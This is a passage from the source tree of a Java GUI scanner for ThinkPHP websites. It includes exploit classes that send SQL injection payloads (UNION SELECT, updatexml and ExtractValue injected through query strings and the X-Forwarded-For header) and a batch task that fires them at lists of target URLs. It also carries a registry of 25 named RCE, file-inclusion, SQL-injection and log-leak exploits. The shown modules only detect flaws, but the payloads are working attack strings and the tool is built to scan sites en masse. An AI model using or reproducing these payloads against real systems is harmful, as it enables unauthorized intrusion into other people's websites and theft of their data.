20 | routes.add("/index.php?s=/home/order/cancel/id/1%27");
21 |
22 | for (String route : routes) {
23 | String payload = url + route;
24 | try {
25 | String res = HttpRequest.get(payload).body();
26 | if (res.contains("SQL syntax")) {
27 | return new Result(true, "ThinkPHP multi sql注入 && 信息泄露漏洞", payload);
28 | }
29 | } catch (Exception e) {
30 | e.printStackTrace();
31 | }
32 | }
33 |
34 | return new Result(false, "ThinkPHP multi sql注入 && 信息泄露漏洞", null);
35 | }
36 |
37 | @Override
38 | public Result exeVUL(String url, String cmd) throws Exception {
39 | return new Result(false, null, null);
40 | }
41 |
42 | @Override
43 | public Result getShell(String url) throws Exception {
44 | return new Result(false, null, null);
45 | }
46 | }
47 |
--------------------------------------------------------------------------------
/src/main/java/com/thinkphp/thinkphpgui/exploit/tp_pay_orderid_sqli.java:
--------------------------------------------------------------------------------
1 | package com.thinkphp.thinkphpgui.exploit;
2 |
3 | import com.github.kevinsawicki.http.HttpRequest;
4 | import com.thinkphp.thinkphpgui.common.BasePayload;
5 | import com.thinkphp.thinkphpgui.entity.Result;
6 |
7 | public class tp_pay_orderid_sqli implements BasePayload {
8 | @Override
9 | public Result checkVUL(String url) throws Exception {
10 | String payload = url + "/index.php?s=/home/pay/index/orderid/1%27)UnIoN/**/All/**/SeLeCT/**/Md5(2333)--+";
11 | try {
12 | String res = HttpRequest.get(payload).body();
13 | if (res.contains("56540676a129760a")) {
14 | return new Result(true, "ThinkPHP orderid sql注入", payload);
15 | }
16 | } catch (Exception e) {
17 | e.printStackTrace();
18 | }
19 |
20 | return new Result(false, "ThinkPHP orderid sql注入", null);
21 | }
22 |
23 | @Override
24 | public Result exeVUL(String url, String cmd) throws Exception {
25 | return new Result(false, null, null);
26 | }
27 |
28 | @Override
29 | public Result getShell(String url) throws Exception {
30 | return new Result(false, null, null);
31 | }
32 | }
33 |
--------------------------------------------------------------------------------
/src/main/java/com/thinkphp/thinkphpgui/exploit/tp_update_sql.java:
--------------------------------------------------------------------------------
1 | package com.thinkphp.thinkphpgui.exploit;
2 |
3 | import com.github.kevinsawicki.http.HttpRequest;
4 | import com.thinkphp.thinkphpgui.common.BasePayload;
5 | import com.thinkphp.thinkphpgui.entity.Result;
6 |
7 | public class tp_update_sql implements BasePayload {
8 | @Override
9 | public Result checkVUL(String url) throws Exception {
10 | String payload = url + "/index.php?money[]=1123&user=liao&id[0]=bind&id[1]=0%20and%20(updatexml(1,concat(0x7e,(select%20md5(520)),0x7e),1))";
11 | try {
12 | String res = HttpRequest.get(payload).body();
13 | if (res.contains("cf67355a3333e6e143439161adc2d82")) {
14 | return new Result(true, "ThinkPHP update sql注入", payload);
15 | }
16 | } catch (Exception e) {
17 | e.printStackTrace();
18 | }
19 |
20 | return new Result(false, "ThinkPHP update sql注入", null);
21 | }
22 |
23 | @Override
24 | public Result exeVUL(String url, String cmd) throws Exception {
25 | return new Result(false, null, null);
26 | }
27 |
28 | @Override
29 | public Result getShell(String url) throws Exception {
30 | return new Result(false, null, null);
31 | }
32 | }
33 |
--------------------------------------------------------------------------------
/src/main/java/com/thinkphp/thinkphpgui/exploit/tp_view_recent_xff_sqli.java:
--------------------------------------------------------------------------------
1 | package com.thinkphp.thinkphpgui.exploit;
2 |
3 | import com.github.kevinsawicki.http.HttpRequest;
4 | import com.thinkphp.thinkphpgui.common.BasePayload;
5 | import com.thinkphp.thinkphpgui.entity.Result;
6 |
7 | public class tp_view_recent_xff_sqli implements BasePayload {
8 | @Override
9 | public Result checkVUL(String url) throws Exception {
10 | String payload = url + "/index.php?s=/home/article/view_recent/name/1";
11 | try {
12 | String res = HttpRequest.get(payload).header("X-Forwarded-For","1')And/**/ExtractValue(1,ConCat(0x5c,(sElEct/**/Md5(2333))))#").body();
13 | if (res.contains("56540676a129760a")) {
14 | return new Result(true, "ThinkPHP recent_xff sql注入", payload);
15 | }
16 | } catch (Exception e) {
17 | e.printStackTrace();
18 | }
19 |
20 | return new Result(false, "ThinkPHP recent_xff sql注入", null);
21 | }
22 |
23 | @Override
24 | public Result exeVUL(String url, String cmd) throws Exception {
25 | return new Result(false, null, null);
26 | }
27 |
28 | @Override
29 | public Result getShell(String url) throws Exception {
30 | return new Result(false, null, null);
31 | }
32 | }
33 |
--------------------------------------------------------------------------------
/src/main/java/com/thinkphp/thinkphpgui/service/BatchCheckTask.java:
--------------------------------------------------------------------------------
1 | package com.thinkphp.thinkphpgui.service;
2 |
3 | import com.github.kevinsawicki.http.HttpRequest;
4 | import com.thinkphp.thinkphpgui.common.BasePayload;
5 | import com.thinkphp.thinkphpgui.util.ExpList;
6 | import com.thinkphp.thinkphpgui.entity.Result;
7 | import com.thinkphp.thinkphpgui.util.Tools;
8 | import javafx.application.Platform;
9 | import javafx.concurrent.Task;
10 | import javafx.scene.control.Alert;
11 | import javafx.scene.control.ComboBox;
12 | import javafx.scene.control.TextArea;
13 |
14 | import java.util.ArrayList;
15 | import java.util.List;
16 |
17 | public class BatchCheckTask extends Task {
18 | Alert alert = new Alert(Alert.AlertType.INFORMATION);
19 | private final ComboBox comboBox;
20 | private final TextArea infores_txt;
21 | private final List list_url;
22 |
23 | public BatchCheckTask(List list_url, ComboBox comboBox, TextArea infores_txt) {
24 | this.list_url = list_url;
25 | this.comboBox = comboBox;
26 | this.infores_txt = infores_txt;
27 | }
28 |
29 | @Override
30 | protected Void call() throws Exception {
31 | batch_check_url();
32 | return null;
33 | }
34 |
35 | public void loginfo(String info) {
36 | this.infores_txt.appendText(info + "\r\n");
37 | }
38 |
39 | public void batch_check_url() throws Exception {
40 | String version = this.comboBox.getSelectionModel().getSelectedItem();
41 | if (list_url.size() > 0) {
42 | if (version.startsWith("ALL")) {
43 |
44 | ArrayList versions = (ArrayList) ExpList.get_exp();
45 | for (String s : list_url) {
46 | loginfo("检测URL " + s + "中......");
47 | loginfo("=====================================================================");
48 | //批量检测查该url是否有效
49 | try {
50 | HttpRequest.get(s).connectTimeout(5000).code();
51 | } catch (Exception e) {
52 | loginfo(s + " 未存活,跳过!");
53 | continue;
54 | }
55 | for (String v : versions) {
56 | BasePayload bp = Tools.getPayload(v);
57 | Result vul = bp.checkVUL(s);
58 | if (vul.isRes()) {
59 | loginfo("[+] 存在" + vul.getVuln());
60 | loginfo("Payload: " + vul.getPayload());
61 | } else {
62 | loginfo("[-] 不存在" + vul.getVuln());
63 | }
64 | }
65 | }
66 | } else {
67 | BasePayload bp = Tools.getPayload(version);
68 | for (int j = 0; j < list_url.size(); j++) {
69 | if (j != 0) {
70 | loginfo("");
71 | }
72 | loginfo("检测URL " + list_url.get(j) + "中......");
73 | loginfo("=====================================================================");
74 | Result isvul = bp.checkVUL(list_url.get(j));
75 | if (isvul.isRes()) {
76 | loginfo("[+] 存在" + isvul.getVuln());
77 | loginfo("Payload: " + isvul.getPayload());
78 | } else {
79 | loginfo("[-] 不存在" + isvul.getVuln());
80 | }
81 | }
82 | }
83 |
84 | } else {
85 | alert.setTitle("提示:");
86 | alert.setHeaderText("URL批量检查");
87 | alert.setContentText("请先导入URL!");
88 | alert.showAndWait();
89 | }
90 | }
91 |
92 | @Override
93 | protected void succeeded() {
94 | Platform.runLater(() -> {
95 | // 在任务完成时执行的代码,比如弹窗提示用户任务已经完成。
96 | alert.setTitle("提示:");
97 | alert.setHeaderText("任务提示");
98 | alert.setContentText("批量检测任务执行完成");
99 | alert.showAndWait();
100 | });
101 | }
102 |
103 | }
104 |
--------------------------------------------------------------------------------
/src/main/java/com/thinkphp/thinkphpgui/service/CheckTask.java:
--------------------------------------------------------------------------------
1 | package com.thinkphp.thinkphpgui.service;
2 |
3 | import com.thinkphp.thinkphpgui.common.BasePayload;
4 | import com.thinkphp.thinkphpgui.util.ExpList;
5 | import com.thinkphp.thinkphpgui.entity.Result;
6 | import com.thinkphp.thinkphpgui.util.Tools;
7 | import javafx.application.Platform;
8 | import javafx.concurrent.Task;
9 | import javafx.scene.control.Alert;
10 | import javafx.scene.control.ComboBox;
11 | import javafx.scene.control.TextArea;
12 | import javafx.scene.control.TextField;
13 |
14 | import java.util.ArrayList;
15 |
16 | public class CheckTask extends Task {
17 | Alert alert = new Alert(Alert.AlertType.INFORMATION);
18 | private final ComboBox comboBox;
19 | private final TextField url_txt;
20 | private final TextArea infores_txt;
21 |
22 | public CheckTask(ComboBox comboBox, TextField url_txt, TextArea infores_txt) {
23 | this.comboBox = comboBox;
24 | this.url_txt = url_txt;
25 | this.infores_txt = infores_txt;
26 | }
27 |
28 | @Override
29 | protected Void call() throws Exception {
30 | check_vul();
31 | return null;
32 | }
33 |
34 | public void loginfo(String info) {
35 | Platform.runLater(() -> this.infores_txt.appendText(info + "\r\n"));
36 | }
37 |
38 | public void check_vul() throws Exception {
39 | String url = this.url_txt.getText();
40 | String version = this.comboBox.getSelectionModel().getSelectedItem();
41 |
42 | if (version.startsWith("ALL")) {
43 | loginfo("检测所有漏洞中......");
44 | loginfo("=====================================================================");
45 | ArrayList versions = (ArrayList) ExpList.get_exp();
46 |
47 | for (String v : versions) {
48 | BasePayload bp = Tools.getPayload(v);
49 | Result vul = bp.checkVUL(url);
50 | if (vul.isRes()) {
51 | loginfo("[+] 存在" + vul.getVuln());
52 | loginfo("Payload: " + vul.getPayload());
53 | } else {
54 | loginfo("[-] 不存在" + vul.getVuln());
55 | }
56 | }
57 | } else {
58 | loginfo("检测漏洞 " + version + "中......");
59 | loginfo("=====================================================================");
60 | BasePayload bp = Tools.getPayload(version);
61 | Result vul = bp.checkVUL(url);
62 | if (vul.isRes()) {
63 | loginfo("[+] 存在" + vul.getVuln());
64 | loginfo("Payload: " + vul.getPayload());
65 | } else {
66 | loginfo("[-] 不存在" + vul.getVuln());
67 | }
68 | }
69 | }
70 |
71 | @Override
72 | protected void succeeded() {
73 | Platform.runLater(() -> {
74 | // 在任务完成时执行的代码,比如弹窗提示用户任务已经完成。
75 | alert.setTitle("提示:");
76 | alert.setHeaderText("任务提示");
77 | alert.setContentText("检测任务执行完成");
78 | alert.showAndWait();
79 | });
80 | }
81 | }
82 |
--------------------------------------------------------------------------------
/src/main/java/com/thinkphp/thinkphpgui/util/ExpList.java:
--------------------------------------------------------------------------------
1 | package com.thinkphp.thinkphpgui.util;
2 |
3 | import java.util.ArrayList;
4 | import java.util.List;
5 |
6 | public class ExpList {
7 | public static List get_exp() {
8 | List list = new ArrayList<>();
9 | list.add("ThinkPHP 2 RCE");
10 | list.add("ThinkPHP 5.0 RCE");
11 | list.add("ThinkPHP 5.0.10 RCE");
12 | list.add("ThinkPHP 5.0.22/5.1.29 RCE");
13 | list.add("ThinkPHP 5.0.23 RCE");
14 | list.add("ThinkPHP 5.0.24-5.1.30 RCE");
15 | list.add("ThinkPHP 5 文件包含漏洞");
16 | list.add("ThinkPHP 5 show-id RCE");
17 | list.add("ThinkPHP 5 method filter RCE");
18 | list.add("ThinkPHP 5 session 文件包含漏洞");
19 | list.add("ThinkPHP 5 SQL注入漏洞 && 敏感信息泄露");
20 | list.add("ThinkPHP 5.x 数据库信息泄露");
21 | list.add("ThinkPHP 5.x 日志泄露");
22 | list.add("ThinkPHP 3.x RCE");
23 | list.add("ThinkPHP 3.x 日志泄露");
24 | list.add("ThinkPHP 3.x Log RCE");
25 | list.add("ThinkPHP 6.x 日志泄露");
26 | list.add("ThinkPHP 6 文件包含漏洞");
27 | list.add("ThinkPHP 6 session文件写入");
28 | list.add("ThinkPHP catch 命令执行漏洞");
29 | list.add("ThinkPHP check-code sql注入漏洞");
30 | list.add("ThinkPHP multi sql注入 && 信息泄露漏洞");
31 | list.add("ThinkPHP orderid sql注入");
32 | list.add("ThinkPHP update sql注入");
33 | list.add("ThinkPHP recent_xff sql注入");
34 | return list;
35 | }
36 | }
37 |
--------------------------------------------------------------------------------
/src/main/java/com/thinkphp/thinkphpgui/util/Module.java:
--------------------------------------------------------------------------------
1 | package com.thinkphp.thinkphpgui.util;
2 |
3 | import com.github.kevinsawicki.http.HttpRequest;
4 |
5 | import java.util.ArrayList;
6 |
7 | public class Module {
8 | public static String getModule(String url) {
9 | ArrayList list = new ArrayList() {{
10 | add("manage");
11 | add("admin");
12 | add("api");
13 | }};
14 | String mod = "index";
15 | for (String s : list) {
16 | try {
17 | int code = HttpRequest.get(url + "/?s=/" + s).code();
18 | if (code == 200) {
19 | mod = s;
20 | }
21 | } catch (Exception e) {
22 | e.printStackTrace();
23 | }
24 | }
25 | return mod;
26 | }
27 | }
28 |
--------------------------------------------------------------------------------
/src/main/java/com/thinkphp/thinkphpgui/util/Tools.java:
--------------------------------------------------------------------------------
1 | package com.thinkphp.thinkphpgui.util;
2 |
3 | import com.thinkphp.thinkphpgui.common.BasePayload;
4 | import com.thinkphp.thinkphpgui.common.ProxyAuthenticator;
5 | import com.thinkphp.thinkphpgui.exploit.*;
6 |
7 | import java.io.BufferedReader;
8 | import java.io.FileReader;
9 | import java.net.*;
10 | import java.util.*;
11 |
12 | public class Tools {
13 | private static final Map payloadMap = new HashMap<>();
14 |
15 | static {
16 | payloadMap.put("ThinkPHP 2 RCE", new tp2_rce());
17 | payloadMap.put("ThinkPHP 5.0 RCE", new tp50());
18 | payloadMap.put("ThinkPHP 5.0.10 RCE", new tp5010());
19 | payloadMap.put("ThinkPHP 5.0.22/5.1.29 RCE", new tp5022_5129());
20 | payloadMap.put("ThinkPHP 5.0.23 RCE", new tp5023());
21 | payloadMap.put("ThinkPHP 5.0.24-5.1.30 RCE", new tp5024_5130());
22 | payloadMap.put("ThinkPHP 5 文件包含漏洞", new tp5_file_inclusion());
23 | payloadMap.put("ThinkPHP 5 show-id RCE", new tp5_showid_rce());
24 | payloadMap.put("ThinkPHP 5 method filter RCE", new tp5_method_filter_rce());
25 | payloadMap.put("ThinkPHP 5 session 文件包含漏洞", new tp5_session_include());
26 | payloadMap.put("ThinkPHP 5 SQL注入漏洞 && 敏感信息泄露", new tp5_sql());
27 | payloadMap.put("ThinkPHP 5.x 数据库信息泄露", new tp5_db());
28 | payloadMap.put("ThinkPHP 5.x 日志泄露", new tp5_log());
29 | payloadMap.put("ThinkPHP 3.x RCE", new tp3());
30 | payloadMap.put("ThinkPHP 3.x 日志泄露", new tp3_log());
31 | payloadMap.put("ThinkPHP 3.x Log RCE", new tp3_log_rce());
32 | payloadMap.put("ThinkPHP 6.x 日志泄露", new tp6_log());
33 | payloadMap.put("ThinkPHP 6 文件包含漏洞", new tp6_lang());
34 | payloadMap.put("ThinkPHP 6 session文件写入", new tp6_session_file_write());
35 | payloadMap.put("ThinkPHP catch 命令执行漏洞", new tp_catch());
36 | payloadMap.put("ThinkPHP check-code sql注入漏洞", new tp_checkcode_time_sqli());
37 | payloadMap.put("ThinkPHP multi sql注入 && 信息泄露漏洞", new tp_multi_sql_leak());
38 | payloadMap.put("ThinkPHP orderid sql注入", new tp_pay_orderid_sqli());
39 | payloadMap.put("ThinkPHP update sql注入", new tp_update_sql());
40 | payloadMap.put("ThinkPHP recent_xff sql注入", new tp_view_recent_xff_sqli());
41 | }
42 |
43 | public static BasePayload getPayload(String select) {
44 | return payloadMap.get(select);
45 | }
46 |
47 | public static boolean checkTheURL(String weburl) {
48 | return weburl.startsWith("http");
49 | }
50 |
51 | public static String addTheURL(String weburl) {
52 | if (!weburl.startsWith("http")) {
53 | weburl = "http" + "://" + weburl;
54 | }
55 | return weburl;
56 | }
57 |
58 | public static List read_file(String file) {
59 | List list = new ArrayList<>();
60 | try {
61 | BufferedReader br = new BufferedReader(new FileReader(file));
62 | String url;
63 | while ((url = br.readLine()) != null) {
64 | url = addTheURL(url);
65 | list.add(url);
66 | }
67 | br.close();
68 | } catch (Exception e) {
69 | e.printStackTrace();
70 | }
71 | return list;
72 | }
73 |
74 | public static String getRandomString(int length) {
75 | String str = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789";
76 | Random random = new Random();
77 | StringBuilder sb = new StringBuilder();
78 |
79 | for (int i = 0; i < length; ++i) {
80 | int number = random.nextInt(62);
81 | sb.append(str.charAt(number));
82 | }
83 |
84 | return sb.toString();
85 | }
86 |
87 | public static void setGlobalProxy(String proxyHost, String proxyPort) {
88 | // 设置 HTTP 代理
89 | System.setProperty("proxySet", "true");
90 | System.setProperty("http.proxyHost", proxyHost);
91 | System.setProperty("http.proxyPort", proxyPort);
92 | }
93 |
94 | public static void setGlobalProxy(String proxyHost, String proxyPort, String proxyUser, String proxyPass) {
95 | // 设置 HTTP 代理
96 | System.setProperty("proxySet", "true");
97 | System.setProperty("http.proxyHost", proxyHost);
98 | System.setProperty("http.proxyPort", proxyPort);
99 | System.setProperty("http.proxyUserName", proxyUser);
100 | System.setProperty("http.proxyPassword", proxyPass);
101 | Authenticator.setDefault(new ProxyAuthenticator(proxyUser, proxyPass));
102 | }
103 |
104 | public static void removeGlobalProxy() {
105 | System.setProperty("proxySet", "false");
106 | System.clearProperty("http.proxyHost");
107 | System.clearProperty("http.proxyPort");
108 |
109 | Authenticator.setDefault(null);
110 | ProxySelector.setDefault(ProxySelector.getDefault());
111 | }
112 |
113 | }
114 |
--------------------------------------------------------------------------------
/src/main/resources/META-INF/MANIFEST.MF:
--------------------------------------------------------------------------------
1 | Manifest-Version: 1.0
2 | Main-Class: com.thinkphp.thinkphpgui.ThinkPhpGuiApplication
3 |
4 |
--------------------------------------------------------------------------------
/src/main/resources/com/thinkphp/thinkphpgui/thinkphp-view.fxml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
12 |
13 |
14 |
15 |
16 |
17 |
18 |
19 |
20 |
21 |
22 |
23 |
24 |
25 |
26 |
31 |
36 |
37 |
38 |
39 |
40 |
41 |
42 |
43 |
44 |
45 |
46 |
47 |
48 |
49 |
50 |
51 |
52 |
53 |
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 |
74 |
75 |
76 |
77 |
78 |
79 |
80 |
81 |
82 |
83 |
84 |
85 |
86 |
87 |
88 |
89 |
90 |
91 |
92 |
93 |
94 |
95 |
96 |
97 |
98 |
99 |
100 |
101 |
102 |
103 |
104 |
105 |
106 |
107 |
108 |
109 |
110 |
111 |
112 |
113 |
--------------------------------------------------------------------------------